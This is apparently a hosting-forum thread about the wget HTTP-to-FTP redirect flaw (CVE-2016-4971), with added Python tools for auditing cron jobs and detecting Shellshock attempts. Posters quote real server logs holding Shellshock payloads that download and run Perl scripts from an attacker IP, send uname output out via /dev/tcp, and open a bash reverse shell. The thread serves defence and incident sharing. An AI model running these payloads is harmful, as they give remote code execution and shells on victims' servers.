A few days ago a wget vulnerability was out and all admins should update it
"GNU wget flaw leads to RCE"
Golunski explains in an advisory that a malicious actor could trick a wget file download process into executing code on someone's Linux machine.
"The vulnerability could potentially [be] abused by attackers to upload arbitrary files and achieve code execution," Dawid Golunski told Softpedia in an email.
GNU wget, which is a Linux command-line utility for silently downloading content, has support for URL redirections, in case a link has changed across time.
"GNU wget doesn't rename files when redirected to FTP links"
Golunski discovered that wget doesn't properly handle file names when redirected from an initial HTTP URL to an FTP link.
For example, an attacker in control of a server from where files are regularly downloaded via wget can use 302 redirects on their files. A user running the "wget http://attackers-server/safe_file.txt" command would be redirected to download "ftp://attackers-server/.bash_profile" instead.
In normal HTTP to HTTP redirects, GNU wget will rename the second file with the name of the original file (.bash_profile to safe_file.txt) in order to prevent RCE (Remote Code Execution). For HTTP to FTP links, wget doesn't include this safety mechanism. This issue affects all GNU wget versions prior to the patched 1.18 version.
Since wget commands are used regularly in scripts that most of the time execute the downloaded file automatically, this opens the door for a new wave of possible attacks. Cronjobs where wget is the preferred method of downloading content should be reviewed by all sysadmins.
CVE Info: https://cve.mitre.org/cgi-bin/cvename.c ... -2016-4971
Server performance optimizations Server security optimizations Database performance optimizations High Availability Proxy MariaDB
Php-Fpm multiple pools
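The thread's advice to review cron jobs that fetch with wget, turned into a check (an added example, not code from the post or from the wget project): it parses crontab text and flags wget fetches over HTTP(S) that do not pin the local filename with -O/--output-document, since a caller-fixed output name means a redirect cannot choose where the file is written. The crontab below is a constructed sample, and the splitter assumes ordinary cron one-liners rather than arbitrary shell; because distributions backport the fix, checking how wget is used is more reliable than comparing version strings.

```python
import re
import shlex

# Constructed sample crontab (not from the thread); line numbers start at 1.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/5 * * * * wget -q http://updates.example.net/pull.sh && sh pull.sh
0 3 * * * wget -q -O /opt/app/feed.json https://feeds.example.net/feed.json
0 4 * * * cd /tmp && wget http://mirror.example.net/nightly.tar.gz && tar xzf nightly.tar.gz
0 5 * * * curl -s https://status.example.net/ | logger
"""

def wget_invocations(command):
    """Yield the argv of each wget call in a crontab command string."""
    # Split on the shell separators seen in cron one-liners; not a full shell parser.
    for segment in re.split(r"\s*(?:&&|\|\||;|\|)\s*", command):
        try:
            argv = shlex.split(segment)
        except ValueError:
            continue  # unbalanced quotes: skip rather than guess
        if argv and argv[0].rsplit("/", 1)[-1] == "wget":
            yield argv

def has_fixed_output(argv):
    """True if the caller pins the local filename with -O / --output-document."""
    for arg in argv[1:]:
        if arg == "--output-document" or arg.startswith("--output-document="):
            return True
        # short option, possibly bundled (e.g. -qO file); O is wget's output-document flag
        if arg.startswith("-") and not arg.startswith("--") and "O" in arg:
            return True
    return False

def audit_crontab(text):
    """Return (line number, URL) for wget fetches whose filename the server controls."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#@":
            continue  # comments and @reboot-style entries are not handled here
        fields = line.split(None, 5)  # five time fields, then the command
        if len(fields) < 6:
            continue
        for argv in wget_invocations(fields[5]):
            urls = [a for a in argv[1:] if re.match(r"https?://", a)]
            if urls and not has_fixed_output(argv):
                findings.append((lineno, urls[0]))
    return findings

if __name__ == "__main__":
    for lineno, url in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: wget fetch of {url} lets the server pick the filename")
```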
UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk
Perhaps something to consider for future releases of OC ... "wget", "curl", "libcurl", ... (Wget and cURL are sometimes used for basic scraping)
Also - an attack vector prevention solution has been provided here as a structured example: http://security.stackexchange.com/quest ... /7095#7095
Dedication and passion goes to those who are able to push and merge a project.
Regards,
Straightlight
Programmer / Opencart Tester
Code:
http://31.220.3.180/mox
This is what it looks like in the general error log (/var/log/error_log)
Code:
/usr/local/apache/logs/error_log:[Wed Mar 16 10:57:34 2016] [error] [client 31.220.3.180] File does not exist: /usr/local/apache/htdocs/hello
/usr/local/apache/logs/error_log:[Fri May 27 08:09:12 2016] [error] [client 31.220.3.180] File does not exist: /usr/local/apache/htdocs/bashh
But if you look at domlogs, you see what is actually going on (/usr/local/apache/domlogs/*)
Code:
/usr/local/apache/domlogs/123.123.123.123:31.220.3.180 - - [16/Mar/2016:10:57:33 -0400] "GET /hello HTTP/1.0" 404 1987 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://31.220.3.180/g.pl;curl -O http://31.220.3.180/g.pl;wget http://31.220.3.180/g.pl;perl /tmp/g.pl*;perl g.pl;rm -rf /tmp/g.pl*\""
/usr/local/apache/domlogs/123.123.123.123:31.220.3.180 - - [27/May/2016:08:09:12 -0400] "GET /bashh HTTP/1.0" 404 1984 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://31.220.3.180/mox;curl -O http://31.220.3.180/mox;wget http://31.220.3.180/mox;perl /tmp/mox*;perl mox;rm -rf /tmp/mox*\""
Watch out for these too, trying to dirtbag up dev/tcp via referer inject, prob so they can pull stuff similar to what was mentioned above:
Code:
[client 192.228.107.101] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo EXAMPLE.COM/cgi-bin/test-cgi > /dev/tcp/192.228.107.101/23; /bin/uname -a > /dev/tcp/192.228.107.101/23"
[client 74.208.111.148] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo EXAMPLE.COM/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo EXAMPLE.COM/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80"
[client 91.109.2.132] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo 123.123.123.123/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo 123.123.123.123/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80"
[client 91.109.2.132] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo example.com/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo example.com/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80"
[client 91.109.2.132] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo www.example.com/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo www.example.com/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80"
[client 91.109.2.132] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo www.media.example.com/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo www.media.example.com/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80"
[client 5.255.82.41] suexec policy violation: see suexec log for more details, referer: () { :;}; /bin/bash -c "echo example.com/cgi-bin/test-cgi > /dev/tcp/213.233.161.42/23; echo example.com/cgi-bin/test-cgi > /dev/udp/213.233.161.42/80
---- RAW ----
98.126.212.154 - - [25/Apr/2016:18:38:02 -0600] "GET /cgi-bin/test-cgi HTTP/1.0" 404 1806 "-" "() { :; }; /bin/bash -i >& /dev/tcp/98.126.212.154/16161 0<&1 2>&1 &"
Suexec blocked it, but you also need some kind of user account jail/cage so that they can't file/perm traverse. CageFS works pretty good IMO
https://creadev.org | support@creadev.org - Opencart Extensions, Integrations, & Development. Made in the USA.
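Detection logic for the Shellshock-style entries quoted in the post above, as an added example (not the poster's code): it scans Apache access_log and error_log lines for the `() { :;};` marker and pulls out the /dev/tcp call-back targets and second-stage download URLs, which are the values worth reporting to the host. The sample lines are constructed in the same shapes as the posted ones, using documentation IP ranges rather than the real clients.

```python
import re

# Constructed sample lines shaped like the access_log / error_log entries in the
# post above, but with documentation IP ranges instead of the real clients.
SAMPLE_LOGS = [
    '203.0.113.5 - - [16/Mar/2016:10:57:33 -0400] "GET /hello HTTP/1.0" 404 1987 "-" '
    '"() { :;}; /bin/bash -c \\"cd /tmp;wget http://203.0.113.5/g.pl;perl /tmp/g.pl\\""',
    '[client 198.51.100.7] suexec policy violation: see suexec log for more details, '
    'referer: () { :;}; /bin/bash -c "echo example.com/cgi-bin/test-cgi > /dev/tcp/198.51.100.9/23"',
    '198.51.100.20 - - [25/Apr/2016:18:38:02 -0600] "GET /cgi-bin/test-cgi HTTP/1.0" 404 1806 "-" '
    '"() { :; }; /bin/bash -i >& /dev/tcp/198.51.100.20/16161 0<&1 2>&1 &"',
    '192.0.2.10 - - [27/May/2016:08:09:12 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

# The Shellshock trigger: an exported-function header value "() { :; };" (spacing varies).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;?\s*\}\s*;")
# Bash's /dev/tcp and /dev/udp pseudo-files used for call-backs and reverse shells.
DEVTCP_RE = re.compile(r"/dev/(tcp|udp)/(\d{1,3}(?:\.\d{1,3}){3})/(\d+)")
# Second-stage downloads handed to wget/curl/lwp-download.
URL_RE = re.compile(r"https?://[^\s;\"'\\]+")
# Client address: leading host field in access_log, or "[client x.x.x.x]" in error_log.
CLIENT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}) |\[client (\d{1,3}(?:\.\d{1,3}){3})\]")

def analyze_line(line):
    """Return a finding for a Shellshock-style log line, or None for a clean one."""
    hit = SHELLSHOCK_RE.search(line)
    if not hit:
        return None
    client = CLIENT_RE.search(line)
    payload = line[hit.start():]  # everything from the trigger onward
    return {
        "client": (client.group(1) or client.group(2)) if client else "unknown",
        "callbacks": sorted({f"{p}://{ip}:{port}" for p, ip, port in DEVTCP_RE.findall(payload)}),
        "downloads": sorted(set(URL_RE.findall(payload))),
        "reverse_shell": "bash -i" in payload and "/dev/tcp/" in payload,
    }

def scan(lines):
    """Findings for every line that carries the Shellshock marker, in input order."""
    return [f for f in (analyze_line(l) for l in lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```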
More information on the subject can be found on this page: https://security-tracker.debian.org/tra ... -2016-4971
GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.
Dedication and passion goes to those who are able to push and merge a project.
Regards,
Straightlight
Programmer / Opencart Tester
This is a VPS, prob should report it to the host indeed. I don't understand why Redhat is in "will not fix" and "deferred" state. It's already backported in Mint 18 (Ubuntu 16.04) at wget 1.17.1.
Here is the 1.18 if anyone needs it http://ftp.gnu.org/gnu/wget/wget-1.18.tar.gz
https://creadev.org | support@creadev.org - Opencart Extensions, Integrations, & Development. Made in the USA.
Dedication and passion goes to those who are able to push and merge a project.
Regards,
Straightlight
Programmer / Opencart Tester
Pounding on the IP itself kinda makes sense since in multi-tenant servers with cPanel, the default webpage lives in /usr/local/cpanel/cgi-sys which is out of OP scope, recursive owned by root:wheel. If they can get it to exec, it may act similar to how they are injecting on root [or user shelled] wget crons and stuff.
https://creadev.org | support@creadev.org - Opencart Extensions, Integrations, & Development. Made in the USA.